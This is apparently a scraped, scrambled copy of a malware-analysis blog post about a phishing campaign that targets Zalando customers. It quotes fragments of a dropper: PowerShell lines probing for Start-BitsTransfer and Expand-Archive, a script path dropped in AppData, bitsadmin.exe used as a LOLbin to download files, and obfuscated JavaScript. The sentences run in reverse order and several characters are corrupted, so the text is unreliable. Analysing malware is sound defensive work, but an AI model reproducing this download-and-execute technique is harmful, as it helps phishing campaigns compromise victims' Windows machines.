![]() ![]() $PsaB17=Get-Command Start-BitsTransfer -ErrorAction Silentl圜ontinue $g3tSp4=Get-Command expand-archive -ErrorAction Silentl圜ontinue Otherwise, it will launch the standalone executable and download files one by one: That's what the attacker is testing in this case: The script checks if BitsAdmin and ExpandArchive are available inside PowerShell and use them. This tool can be called directly from Powershell. It uses bitsadmin.exe, the well-known LOLbin, to download many files from a website. The script is less heavily obfuscated and easy to understand. The script is a dropper and will drop/execute a PowerShell script: C:\Users\user01\AppData\Roaming\42c0tyi.ps1 ![]() The script contains some references to "WScript" to call the method "ShellExecute"… We are facing a script for Windows. Var z = -parseInt(s(hw.E, hw.i)) / 0x1 + parseInt(J(hw.u, hw.z)) / 0x2 * (parseInt(J(hw.S, hw.L)) / 0x3) + -parseInt(o(hw.T, hw.f)) / 0x4 * (parseInt(s(hw.R, hw.Q)) / 0x5) + parseInt(V(hw.g, hw.n)) / 0圆 + -parseInt(V('0x22f', hw.d)) / 0x7 + parseInt(D(hw.l, hw.W)) / 0x8 + -parseInt(o(hw.c, hw.x)) / 0x9 ĭiving into the code to spot interesting strings or techniques is always interesting. Here is an example of an implemented function: The attached archive contains a single JavaScript zipdump.py nine-life1107.zipĪs usual, with this language, the script is pretty well obfuscated. It was the first time that I saw them used in a phishing campaign. Zalando is a German retailer of shoes, fashion across Europe. Recently, I received a bunch of phishing emails targeting Zalando customers. We get daily emails from well-known brands (like DHL, PayPal, Netflix, Microsoft, Dropbox, Apple, etc).
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |